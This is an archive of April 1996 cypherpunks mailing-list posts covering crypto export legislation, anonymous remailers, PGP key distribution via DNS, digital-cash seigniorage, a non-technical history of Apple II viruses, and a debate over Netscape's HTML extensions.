Date: Sun, 7 Apr 1996 13:51:08 +0800
To: cypherpunks@toad.com
Subject: RNG_DEVICE Environment Variable?
Message-ID: <199604062155.QAA00591@miron.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


>Considering a couple of RNG hardware manufacturers use different 
>names for device interfaces, perhaps it would be 'convenient' to 
>have apps look for the environment variable RNG_DEVICE which gives 
>the name of whatever device is used (rnadom$, random, rand, even 
>lpt2...) or even a special file that is mixed periodically by a cron 
>job (noiz.c?).

>The assumption is that reads from that device would return "truly 
>random" bytes (not from a pseudo-RNG), either from specialized 
>hardware or a system-noise sampler such as noise.sys (DOS) or 
>random.c (Linux, FreeBSD).

>How software would handle not getting enough bytes is another matter, >
>perhaps left configurable to the app.
>
>Rob. 

My hack to PGP to support RNG uses the varriable RNGDRIVER,
but is in config.txt, not the environment.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Checkered Daemon <cdaemon@goblin.punk.net>
Date: Sun, 7 Apr 1996 13:39:39 +0800
To: cypherpunks@toad.com
Subject: Re: Someone's screwing around with anon.penet.fi
In-Reply-To: <WALTER.96Apr6143709@cithe302.cithep.caltech.edu>
Message-ID: <199604070101.RAA18207@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> 
> In article <cypherpunks.Pine.BSF.3.91.960406114609.5026B-100000@kirk.edmweb.com> Steve Reid <steve@edmweb.com> writes:
> 
> >   Here's another one of them unsolicited messages from anon.penet.fi.
> 
> I also got one of these right after I posted to cypherpunks.  I
> normally just lurk, and the address that was used is the machine I
> read and post news on(we have a gateway to the mailing list).  So I am
> pretty sure it is related to my posting to cypherpunks.  
> 
> I have written to the administrators at anon.penet.fi asking about this
> and informing them.  I'll pass on any relevant info they send me.
> 
> -Chris
> walter@cithe501.cithep.caltech.edu
> 

OK, somebody correct me if I'm wrong here, I haven't used anon.penet
since I got mixmaster running ...

When you send a message to someone at anon.penet, the anonymous remailer
assumes that, since you're using a remailer, you want to be anonymous.
So it gives you an account, sends your message on via that account, and
informs you of the account information.  If you try it a second time,
you're already in the database, so you don't hear from them again.

So if you make your first post to cypherpunks, and somebody has subscribed
to the list via the anon.penet remailer ...

- -- 
The Checkered Daemon			       	  cdaemon@goblin.punk.net


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0

iQCVAwUBMWcTxoQO/w1Q7FIdAQF0IAP+PoHjRPxP+0lZS7NlIKq42D/ypS62h20I
9Rv6qeIadya5iWqp6CuQJSXoA9eO7x1wNaNUtrfJUVJ4F8aIJJW6F6z9Urx639rC
KmvaDJsWclnK3fv11rTDzyBSE6Ngp3mfz3ONBgc7sEN06R0rwl06qoqZzmcs7lwJ
3r/pxoB7mvM=
=Zbdw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 7 Apr 1996 14:05:10 +0800
To: "Dave Banisar" <cypherpunks@toad.com>
Subject: Re: ACM/IEEE Letter on Cryp
Message-ID: <m0u5j2u-0008ypC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:25 PM 4/6/96 -0500, Dave Banisar wrote:
>The export language comes from the origional Cantwell bill and orders the
>Commerce Sec. 

Could somebody re-post that Cantwell bill?

>to allow export of mass market software and allows somewhat more
>limited export of non-mass market software dependng on what is available to
>banks in that country.

Which country?  The country to be exported to?  This bill is starting to 
sound distinctly manipulative!  Remember, once it's out of the country, it 
can be sent _anywhere_ so it is pointless to include any destination 
distinctions, including "terrorist countries." 

And what happens if the only software available to banks in that country (by 
their law) requires some sort of key-escrow function, even if that country allows 
non-escrowed encryption to citizens?  Do we get to export or not?

It's already beginning to smell.  The original claim, as I recall, was that 
export would be allowed if something was already available with at least as 
high a level of protection. No distinction as to _where_ that software was 
available.   That would be a fairly broad allowance.  Now, we are seeing 
that the evil hand of government is being inserted into the equation:  
Suddenly, what their government ALLOWS BANKS is the distinguishing factor.  GRRRRRR!

This is _exactly_ why I want to see this bill BEFORE it is officially 
introduced, and why everyone else here should as well.

>Its not ideal 

Maybe it should be.  There is already serious doubt as to whether this bill 
could even hope to pass before the end of the current session. That's not 
surprising; it will be introduced very late.   If it can't pass, I see 
absolutely no reason to include misfeatures in a bill that will have many 
months to be re-written before the next session.  Nothing is set in stone; 
it can all be changed _if_ it's not part of some sort of secret deal.

The way I see it, if there is not a strong probability that it will be voted 
in, there is no reason to introduce a flawed bill.  Even more so, there is 
no reason to support a hurried bill if the apparent reason for the hurry is 
to ensure that the bill contains "features" that will be hard to remove in 
the future.  If Burns can't do it right soon enough to pass, he needs simply 
take an extra month or two and publicize the _corrected_ bill on (surprise!) 
the Internet, and worry about introducing it in the next session of 
Congress. (He'll get the election-year political benefit just as 
effectively.  Pardon me for being cynical.)   I can't see that anybody is 
going to hold a little delay against him.


>(I think the limits on non-mass market
>should be the same as mass market- almost none except for a limited number of
>"terrorist" countries (we'd get killed if we argue that those should be
>eliminated) but overall much better than leahy's and somewhat better than
>goodlatte's bill.

Pardon my language, but WHAT THE HELL IS "MASS MARKET SOFTWARE"?

_Everybody_ wants their software to sell as many copies as possible; what is 
the difference between something which sells 10,000 copies and something 
that sells 10 million?  Is this bill a sop to Egghead software?

Is the legal difference going to be cost?  Say, anything less than $1000?  
That would at least make a distinction that has a certain level of precedent 
behind it, since export licenses have had minimal-dollar-value exceptions 
built in for a long time.    What about freeware/shareware?

And you didn't answer my question about whether key length alone was a 
distinguishing feature, or software function.  This is not looking good.  
Too many conditions?  Too many exceptions?  Too many caveats?  Why can't 
those sleazy politicians give us what we want?

Ooops, I just answered my own question.

Jim Bell

jimbell@pacifier.com  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sun, 7 Apr 1996 11:45:53 +0800
To: cypherpunks@toad.com
Subject: Re: Australia's New South Wales tries net-censorship
Message-ID: <2.2.32.19960406114718.0067a910@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12:45 PM 04/6/96 -0500, Stan Bernstein <sbernst@panix.com> wrote:
>
>
>On Sat, 6 Apr 1996, Declan B. McCullagh wrote:
>[snip]
>> 

... <snip> ...

>
> One wonders 
>whether "download" or "retrieve" could be applied to netsurfing on the 
>World Wide Web, which procedure "caches" web information in the 
>end-viewer's hard drive often for several days or even months depending 
>on configuration of browser software.

Makes me wonder if browser companies/authors couldn't be dragged into any
such conflicts. If Person A inadvertently stumbles across Pedophiles 'R' Us
on the net, and quickly moves on, I have yet to see a browser that lets
him/her say "quick - delete that last cacheing operation", thus *making*
him/her 'guilty' of criminal possession.

Legal opinions?

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMWY9GcVrTvyYOzAZAQH8eQP8DxckYYyMg10XcQdH67G22hIsvuREGDOI
AgN/aSJXDddwg0PslLqA3MVxCOB4POLLMx5EAO0aQ5yGVIBNdFNoG/9fQPi7DHMj
rulR9PNClQG5krJ6jRDGT1KvE29xUu3inZLcPZF47N11+N5WWJ1YBUqdnlGJNrCb
YXifso2HZjo=
=EBit
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Sun, 7 Apr 1996 11:52:35 +0800
To: "Bill Frantz" <jimbell@pacifier.com>
Subject: Re: ACM/IEEE Letter on Cryp
Message-ID: <n1383307207.33041@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


The export language comes from the origional Cantwell bill and orders the
Commerce Sec. to allow export of mass market software and allows somewhat more
limited export of non-mass market software dependng on what is available to
banks in that country. Its not ideal (I think the limits on non-mass market
should be the same as mass market- almost none except for a limited number of
"terrorist" countries (we'd get killed if we argue that those should be
eliminated) but overall much better than leahy's and somewhat better than
goodlatte's bill.

-d



--------------------------------------
Date: 4/6/96 6:07 PM
To: Dave Banisar
From: jim bell
At 01:22 PM 4/6/96 -0800, Bill Frantz wrote:
>At  9:58 AM 4/6/96 -0800, jim bell wrote:
>>[on the Burns bill]

>>That sounds okay as far as it goes, but I can see a potential problem.  Your

>>wording above is unclear, but if the Burns bill totally eliminates export 
>>controls that's great. However, we've frequently heard talk of "compromises"

>>like the Leahy bill which seem to relate exportable encryption to that which

>>is already available overseas.  There have been suspicions around there that

>>this is intended to keep the American producers out of the market as long as

>>possible, which is still a problem.  I don't think that's acceptable.
>
>I have no objection to the salami approach in this case.  The way the Burns
>proposal has been described, it seems all together better than the current
>situation.  We can fight the next battle after people realize that the four
>horseman are well and truly loose, and that the world hasn't ended.  When
>the Burns proposal has been written up into a bill and introduced, I expect
>I will be writing my congresscritters asking them to support it

Myself also, I suppose.  That's why I'm so concerned that it not contain any 
component that could be easily be re-written more to our liking.  The big 
attraction of the Burns bill, from a strategic standpoint, is that (by the 
elimination of export controls, assuming it does it) it removes the one 
major "must do" task onto which could be loaded other "features" that we 
can't stand, as the Leahy bill tried to do.  Once export controls are 
eliminated on crypto, it should become impossible to get enough support to 
pass a bill even mentioning key escrow, let alone mandating it. 

Jim Bell
jimbell@pacifier.com


------------------ RFC822 Header Follows ------------------
Received: by epic.org with SMTP;6 Apr 1996 18:06:34 -0500
Received: from ip8.van1.pacifier.com  by pacifier.com
	(Smail3.1.29.1 #6) with smtp for <banisar@epic.org>
	id m0u5ggW-0008xbC; Sat, 6 Apr 96 14:42 PST
Message-Id: <m0u5ggW-0008xbC@pacifier.com>
X-Sender: jimbell@pacifier.com
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sat, 06 Apr 1996 14:40:21 -0800
To: frantz@netcom.com (Bill Frantz),"Dave Banisar" <banisar@epic.org>,
 "Cypherpunks List" <cypherpunks@toad.com>
From: jim bell <jimbell@pacifier.com>
Subject: Re: ACM/IEEE Letter on Cryp




_________________________________________________________________________
Subject: RE>>ACM/IEEE Letter on Cryp
_________________________________________________________________________
David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301  *  HTTP://www.epic.org
Washington, DC 20003                *  ftp/gopher/wais cpsr.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 7 Apr 1996 11:41:25 +0800
To: cypherpunks@toad.com
Subject: Re: "Contempt" charges likely to increase
Message-ID: <2.2.32.19960406233612.00c9b6fc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:26 PM 4/5/96 -0800, Timothy C. May wrote:

>Jail term for contempt of court has certain resemblances to trial by
>ordeal: if after some period of time of ordeal one has not talked, the
>ordeal is over.

Also, such a penalty will be pretty rare.  One doesn't stop driving because
one might be killed in a car accident.  The number of people who will be
jailed annually for contempt for "failure to decrypt" will always be small
and a rapidly declining percentage of total world transactions will lead to
such jailing (as transaction numbers double and redouble as more of the
world's people enter the Market and the Net).  Coercion is a dull tool
because people have an incentive to avoid it.  Reward is a sharp tool
because people seek it out.  One of the reasons markets beat governments.

DCF

"Well, say what you will but Right Wing Mad Bombers kill more people than
Left Wing Mad Bombers."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Hamilton <martin@mrrl.lut.ac.uk>
Date: Sun, 7 Apr 1996 06:05:31 +0800
To: cypherpunks@toad.com
Subject: Re: pgp keys
In-Reply-To: <199604060900.BAA24994@dfw-ix3.ix.netcom.com>
Message-ID: <199604061756.SAA24919@gizmo.lut.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart writes:

| At 11:55 AM 4/4/96 -0500, Jack P. Starrantino   jpps@voicenet.com wrote:
| >Is there a reliable method for obtaining the pgp public key for an
| >arbitrary email address? [....] to obtain keys I do not have.
| 
| Reliable?  No; not everybody follows The One True KeyDistribution Method,
| or even follows one-or-more of the popular electronic approaches, 
| and not all keys that are distributed electronically are on the Internet,
| though some of them may be on intranets or fido or uucp nets.

It would be neat if individual Internet sites could run their own key 
servers in a distributed framework, using whatever protocol(s) they 
wanted to.  Finding someone's public key shouldn't be rocket science - 
if you already have their email address.  Checking the signatures might 
be, though ?

The pgp.net folks have established the convention of "keys.<domain 
component>.pgp.net", which lends itself to a simple algorithm along the 
lines of...

  Email address:
    martin@mrrl.lut.ac.uk
  Look for:
    keys.mrrl.lut.ac.uk.pgp.net
    keys.lut.ac.uk.pgp.net
    keys.ac.uk.pgp.net
    keys.uk.pgp.net
    keys.pgp.net

I'm not clear on whether it would be friendlier on the DNS to start 
with the least specific cases and move down to the most specific (i.e. 
reverse the order of the steps).  The latter would seem to result in 
less junk (NXDOMAIN responses) being kept by DNS servers which 
implement negative caching.

Keyservers might be reasonably be expected to speak a number of 
protocols ?  e.g. mail to "pgp-public-keys", finger, and perhaps a 
dedicated key lookup protocol ?

OK so we're lacking a mechanism for indicating things like which 
protocols/services a host supports, on which port numbers, etc...  
Perhaps it isn't even something we should be thinking about in relation 
to key servers ?  In any case, lots of new DNS RRs have been proposed 
which could handle the problem - but not implemented or deployed :-)

As a quick hack, I suppose the embedded URL scheme used by Netfind 
could be nicked and put to use for public key servers, e.g. in 
pseudo-Perl

  foreach (text record at keys.<domain>.pgp.net) {
    next unless /^kx-/;     # only interested in kx-<URL>
    s/^kx-//;               # toss Key eXchanger prefix out
    &do_something_with($_); # use resulting URL
  }

Do people have any opinions about these ideas ?  Obviously the DNS is 
going to be vulnerable to spoofing, so those URLs may be dodgy.  If 
we're checking the signatures aggressively this needn't be a problem, 
at least in relation to serving up public keys ?

If anyone knows of a forum where this stuff is being discussed, I'd 
appreciate a pointer.  Would be happy to set up a dedicated list if 
there isn't anything already.  FWIW, I don't seem to see any discussion 
on cypherpunks, coderpunks, spki, ietf-pkix, ietf-asid, ietf-ids, ... 
:-(

Martin






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 7 Apr 1996 16:04:49 +0800
To: James Gleick <gleick@around.com>
Subject: the value of money
In-Reply-To: <2.2.32.19960406060312.006d58c0@pop3.interramp.com>
Message-ID: <199604070315.TAA12896@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



JG
>This is a very real issue. To the extent that electronic money replaces 
>currency (reduces the amount in circulation), it will cost the Treasury 
>seigniorage--and the Government is acutely aware of this. Whether the 
>beneficiaries are consumers, banks, or other issuers of digital cash will 
>depend on the system. 

pardon me but just for fun, would you mind debunking some conspiracy
theories on this subject, since you seem to understand our system?
there are a lot of people now claiming
that the federal reserve is a system designed to slowly cause the
entire US economy to go into debt to it via charging interest on
the loaning of paper money. how do you address this?

to me the idea that cybercurrency might escape possible manipulations
and machinations that are happening in the real world currency
markets is quite liberating. I would also expect to see some
powerful interests try to fight it for this reason.

p.s. if you are really you, thought you made some great points
about the Unibomber on Peter Lawrence, and I also love your
two books, Chaos and on Feynmann.  keep up the great work.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Ghio <ghio@myriad.alias.net>
Date: Sun, 7 Apr 1996 16:00:47 +0800
Subject: Re: Was Cohen the first?
In-Reply-To: <35960405162553/0005514706DC3EM@MCIMAIL.COM>
Message-ID: <199604070321.TAA02171@myriad>
MIME-Version: 1.0
Content-Type: text/plain


The following concerns the history of computer viruses.  While an
important issue in computer security, this has no direct relevance to
cryptography, so skip this message if you're looking for crypto...

---

> What's up? I asked. The 17-year-old snickered. Doom was ahead for all Apple
>II owners.  "Don't engage in casual disk-copying with strangers," he said.
> "You might catch an operating-system virus."

One interesting fact is that after the release of DOS 3.3 in 1980, the Apple
II operating system was unchanged for several years, until Apple released a
completly rewritten operating system (ProDOS) in 1984.  During this period,
hackers disassembled DOS 3.3 and its internal functions and data structures
became well-known.  The Apple II ROM contained a debugger/disassembler,
which allowed the operating system to be disassembled and experimentally
modified while it was resident in memory.  In addition, several companies,
including Beagle Brothers and Quality Software, published extensive
information on DOS 3.3, which had been obtained through reverse-engineering.

Apple DOS behaved very predictably: it was always loaded at the same
location in memory, and when it formatted a disk, always wrote the operating
system into the same location on the first three tracks of the floppy disk.
This allowed the development of object code patches to the DOS kernel which
would work reliably because almost everyone was running identical copies of
DOS.

It also made it easy to write viruses.  The simplest was to attach a call to
the sector-write subroutine at the end of the catalog command.  This only
took about 16 bytes of code.  (Wouldn't that have made a neat .sig for you
modern-day perl hackers?)  Whenever the user issued the catalog command
(which gave a list of files, like the unix ls command) it would write out
that page of memory onto the dos image on the disk, thus infecting the disk.
This was entirely benign unless you tried to use a disk with a different or
modified operating system, in which case the patch would not apply cleanly,
and would likely make the disk unbootable.

Despite this, the Apple II never became a popular virus-writing platform.
There are several possible reasons for this, but one of the main ones is
that few Apple II users had hard disks.  On the IBM PC, it was easy for a
virus to get on the hard disk, then systematically infect every floppy disk
put into the system.  Apple II users, in contrast, often booted from
floppies, and often rebooted when switching to a different software package,
thus purging the virus from memory.  (Pressing control-reset on the Apple II
keyboard would always pull the reset line on the CPU, so it wasn't possible
to trap the interrupt like it is possible to trap ctrl-alt-del on the PC.)

A couple bits of interesting virus trivia: Joe Dellinger, then an undergrad
at Texas A&M, set out to write the "perfect" virus, that is, one that would
silently replicate without causing harm, just to see how far it would
spread.  The virus added a tag to the end of the boot sector which read:
GENxxxxxxxTAMU, where xxxxxxx was the generation counter.

A destructive virus called "CyberAIDS", appeared in 1988.  I just looked
this one up in an old magazine article, and, when the virus destroyed a
disk, it printed, among other drivel:
             DISTRIBUTED BY
       Worshippers of Pat / [WOP]
          The Kool/Rad Alliance
  The Robert Dole Presidential Campaign
I wonder if Bob Dole appreciated the free advertising.  (Also remember
that this was in 1988!)

Modern operating systems make kernel-patching viruses like the simple
ten-byte hacks effectively impossible since the operating system is less
predictable with respect to its memory usage, people upgrade more
frequently, and many experienced users compile their own kernel.
Modern protected-mode operating systems are also making boot-sector viruses
obsolete as well.  That leaves executable file viruses.  

By the late eighties, hard disks were becoming fairly standard equipment,
and the "CyberAIDS" virus mentioned above attached itself to executable
files.  Filesystem security and read/execute-only memory pages on Unix
systems make writing effective viruses of this type quite difficult.
Unfortunately, Microsoft's lax attitude toward security allows viruses to
persist on their operating systems, and have made Bill Gates very popular
with the virus writing groups.  In addition, the lack of filesystem security
in Windoze makes the shared libraries, and key system files, prime targets
for malicious code.

Still, as the famous login hack demontrates, it's not impossible to write a
unix virus, if you can get control of the compiler/linker.  It's just that
there are other methods of hacking unix systems (ie buffer overruns) which
provide a more immediate return on the investment of time for the hacker.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 7 Apr 1996 16:19:07 +0800
To: Steve Reid <steve@edmweb.com>
Subject: Re: myths of software "standards"
In-Reply-To: <Pine.BSF.3.91.960406032352.2796A-100000@kirk.edmweb.com>
Message-ID: <199604070323.TAA13375@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



SR:
>Sure, the Netscape extensions are nice. And it's nice to have an operating
>system (M$-DOG) pre-installed on every hard drive. But Net$cape, like M$,
>was trying to esablish a dominant "follow-us-or-die" position in the 
>industry. 

that was exactly the view I was trying to discredit us in my post.
did Netscape protect their creations with patents? no. what did they
do that prevents other browsers from immediately latching onto 
their keywords?? we are talking about *bits*!!! oh, do  they have
too much PRIDE or something to use an idea that somebody else
innovated? I think in all this ranting is lost the basic fact
that Netscape did what they did to be *innovative* and this
innovation is what is driving the net. can you indicate to me
why or how they were trying to squelch competition? what kind
of squelching is possible in a world where the next version of
anybody's software can immediately incorporate their own features?

>Yes, the Net$cape extensions allow people to do stuff that they wouldn't 
>otherwise be able to do. But, the extensions *could have* been 
>implemented in such a way that using them wouldn't be detrimental to 
>non-Net$cape browsers.

you seem to be suggesting that they intentionally tried to screw
up non-netscape browsers, which I find laughable.

> Instead, they've altered the World Wide Web in 
>such a way that it can only be viewed "correctly" with Net$cape.

this was by the choice of people who wrote web pages, who made
the collective decision to follow netscape. you are not criticizing
netscape, you see, you are simultaneously criticizing every person
who has made the decision to go with their standard. which is
a rather unenlightened way to look at the way that standards on
the internet work, imho-- they are not "handed down by anyone".
netscape could have been roundly ignored, and a zillion standards
die every year for this reason. but netscape made a positive 
contribution, and this is reflected in the agreement of every
person who voluntarily, under total free will and no coercion,
picked their standard. can you tell me how netscape
twisted a single person's arm to put netscape tags in their
web pages?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Sun, 7 Apr 1996 07:54:13 +0800
To: cypherpunks@toad.com
Subject: e$ seigniorage (and is this the cost of untracability?)
Message-ID: <199604061906.VAA16731@kampai.euronet.nl>
MIME-Version: 1.0
Content-Type: text/plain


James Gleick wrote:

> Perry E. Metzger wrote:
>
> >James Gleick writes:
> >
> >> Seigniorage is actually the Government's interest income on all the
> >> currency in circulation.
> >
> >Seignorage is neither of these things. It is the difference between
> >the cost of producing a currency token (like a quarter or a dollar
> >bill) and the face value of the token. In essense, its the profit
> >margin on printing or minting money.
>
> You're giving a definition straight from a dictionary--an old one.
> Welcome to the modern world.

I think you're both right - Seignorage is the interest on the difference
between the cost of producing the token and the face value of the token
from the time the token is issued till the time it is redeemed.

In the case of most government issued currencies though, the tokens can
never be redeemed, so the total interest will be equal to the difference
between the cost of manufacture and the face value.

It is interesting to note that casinos could earn seignorage on their chips
in circulation, and issuers of book/record/gift tokens will certainly earn
seignorage on their tokens in circulation, and since these different types
of token money reduce the amount of government currency in circulation,
these earnings will be at the expense of the treasury.


> This is a very real issue. To the extent that electronic money replaces
> currency (reduces the amount in circulation), it will cost the Treasury
> seigniorage--and the government is acutely aware of this.

Sure, and this is equally true of cheques and credit cards replacing
government currency.  As to whether the government is concerned, that is
subject to debate.  If so, why all the government attempts at reducing
cash transactions?

> Whether the beneficiaries are consumers, banks, or other issuers of digital
> cash will depend on the system.

For e-cheque systems, the beneficiaries will be the consumers, in that the
money which was previously in their wallets will now be earning interest in a
bank account (assuming of course that the bank passes this benefit onto the
customer).  In the case of ecash (from DigiCash), however, the withdrawal
of ecash from an account is done some time previous to it being spent and
deposited, therefore the ecash is "in circulation".  In this situation, the
ecash issuer will earn seignorage on all the circulating ecash.

Two questions arise:

    - What will be the typical time between the withdrawal of ecash
	  and it being deposited?

    - Does the untraceability of ecash (of all types) rely on a time delay
      between withdrawal and deposit (I guess it does), and if so, is the
      interest that the consumer inevitably loses (and the ecash issuer gains)
      the price the consumer must pay for untracability of transactions?


Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@kampai.euronet.nl>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 7 Apr 1996 17:18:06 +0800
To: cypherpunks@toad.com
Subject: Re: "Contempt" charges likely to increase
Message-ID: <m0u5mjb-00090mC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:27 PM 4/6/96 -0800, Timothy C. May wrote:

>This model, is, I contend, the model with which courts are familiar. They
>know that Alice can retrieve the funds, so they simply order her to. If she
>does not comply, contempt of court. Q.E.D.
>
>What of a different model? What if, say, her funds are in a "time lock
>deposit," with the bank unwilling or even unable (cryptographic protocols
>involving multiple key holders) to retrieve the funds until, say, 2010?
>Even if she is being tortured to death and pleading with the
>Gemeinschaftbank of Zurich to please, pretty please, release her funds,
>they cannot.
>
>It may take some convincing, and some education of the court (a la the
>education that is slowly happening, as in the CDA case), but eventually it
>will be realized that "contempt of court" is not applicable.

I look at it this way:  It is inappropriate to look just at the desire of 
the court and its sanctions, it is necessary to study what kind of "crimes" 
are normally dealt with in such a fashion, and why they need to be crimes in 
the first place.

Over time, technology is dramatically increasing our protections:  From 
locks to alarms to monitoring systems to remote cameras, with bank accounts 
that are secure from ordinary criminals, we are becoming less and less 
dependant on government for our security.  Since the ostensible purpose of 
courts is nominally to protect us, if those protections begin to be replaced 
by technology the logical conclusion is that courts will become less 
numerous and less powerful.  The problem is, that isn't happening, and the 
reason is that organizations tend to act in ways to protect their own power 
and influence.  In fact, the average citizen is subject to far more theft of 
his assets BY THE GOVERNMENT than by common criminals, so at some point we 
have to realize that the government is now a net problem, rather than being 
a net solution.

I think that most crimes that subpoenas  would normally be used for are 
probably not crimes at all, and are probably "malum prohibitum," not "malum 
in se" crimes. And in the future, they would likely be used to harass 
political enemies, as harassment was done in the 1950's and 60's.   This 
means, for anybody of a libertarian bent, that it would actually be better 
if the government could be rendered incapable of enforcing them.  Naturally, 
governments and courts will resist, but that will be irrelevant.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Haskovec <dhaskove@ucsd.edu>
Date: Sun, 7 Apr 1996 17:21:10 +0800
To: cypherpunks@toad.com
Subject: NYT: Chaotic Encryption: a Solution in Search of a Problem
Message-ID: <2.2.32.19960407061512.0034fb58@sdcc10.ucsd.edu>
MIME-Version: 1.0
Content-Type: text/plain


The New York Times online site reports on a researcher at Oak Ridge National
Labs who "devised and patented a new mathematical system for encrypting and
authenticating digital data, based on the scientific concept of chaos."  The
article mention that people in industry were less than enthused about
adopting it.  Even the inventor says that it "isn't robust enough for
military applications."  It seems to use a chaotic system at both ends with
a symmetric key.  It almost sounds like the NYT covered it because chaos is
"cool", not because this development is significant.  Any insights?

The story is online at http://www.nytimes.com/library/cyber/week/0407chaos.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Sun, 7 Apr 1996 17:23:27 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: myths of software "standards"
In-Reply-To: <199604070323.TAA13375@netcom17.netcom.com>
Message-ID: <Pine.BSF.3.91.960406192913.5521A-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> >Sure, the Netscape extensions are nice. And it's nice to have an operating
> >system (M$-DOG) pre-installed on every hard drive. But Net$cape, like M$,
> >was trying to esablish a dominant "follow-us-or-die" position in the 
> >industry. 

> that was exactly the view I was trying to discredit us in my post.
> did Netscape protect their creations with patents? no. what did they

Of course not. If they "protected" their creations with patents, a lot 
of people would be less likely to use them. If the Net$cape extensions 
weren't used, everything would look fine on other browsers and there 
would be no pressure on the remaining non-netscape users (25%?) to switch 
to Net$cape.

> why or how they were trying to squelch competition? what kind
> of squelching is possible in a world where the next version of
> anybody's software can immediately incorporate their own features?

The "Why" can be answered very easily: $$$. Netscape is not some
not-for-profit thing like PGP, Netscape is a COMMERCIAL CORPORATION. Keep
that in mind while I explain the "How"...... 

I think it is not unlike what Micro$oft did in the early 80s... They put
out a good OS (it was considered good at that time) and sold it really
cheap, and they obtained a large market share. Since they had such a large
market share, most of the software developers wrote for M$-DOS. Since
practically everyone was writing for MS-DOS, the public bought MS-DOS. 
Other OS developers could write M$-DOS clones, but they would be just
that- clones. They would have no reason to write in new features, since
very few people would be bold enough to write software that wouldn't run
on M$-DOS. The OS makers would be condemned to forever follow Micro$oft
and try to maintain compatability. To this day, the mass market still
centers around the MS operating system. 

With Netscape, it was similar... They put out a good browser (And I'm not
arguing there- IMHO it's the best browser currently available) for really
cheap, for many people it was even Free. They've obtained a large market
share. Since they have such a large market share, everyone writes web
pages for Net$cape. Since there are now so many "Get Netscape!" web pages,
even more people are switching to Netscape. Sure, other browsers could add
their own extensions, but if they won't work on Net$scape, nobody will use
them. And every non-net$cape browser will be OBSOLETE as soon as the next
version of net$cape comes along with it's new extensions. 

> picked their standard. can you tell me how netscape
> twisted a single person's arm to put netscape tags in their
> web pages?

No arm twisting was necessary, once Net$scape had their large market 
share. Just as there was no arm twisting to get people to write software 
for MS-DOS and Windoze. Once a software company has a large enough market 
share that they can define the standards for everyone else, they are 
extremely difficult to "de-throne". At least Net$cape isn't abandoning 
the *official* HTML standards.

Before I sign off, I will say that Netscape is a good browser. It may well
be that they simply created the extensions to make the WWW better. But,
since Netscape *IS* a commercial company, I tend to believe that they did
it to ensure their own profits. Really, there is no Real Proof either 
way, so this tends to be a rather controversial (and opinionated) topic.

Some good might yet come from this... If Netscape and Microsoft start 
battling over the "Web As An Operating System" market, Net$cape and 
Micro$oft might chip away at each other enough to let the smaller 
companies catch up. (Wishfull Thinking)

I guess this is kinda off the topic of the Cypherpunks list... I think we 
should just "agree that we disagree" and let the matter be.

========================================
[This email signatu
r
e file is best 
		viewed with the FooBar 
	Mailer Program]
========================================
;)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rakers@flash.net
Date: Sun, 7 Apr 1996 15:50:58 +0800
To: cypherpunks@toad.com
Subject: Remove my name from this distribution list
Message-ID: <199604070339.VAA21901@defiant.flash.net>
MIME-Version: 1.0
Content-Type: text/plain


Remove my name from this distribution list, thanx.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Sun, 7 Apr 1996 17:21:21 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: the cost of untracability?
Message-ID: <199604070539.VAA27922@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


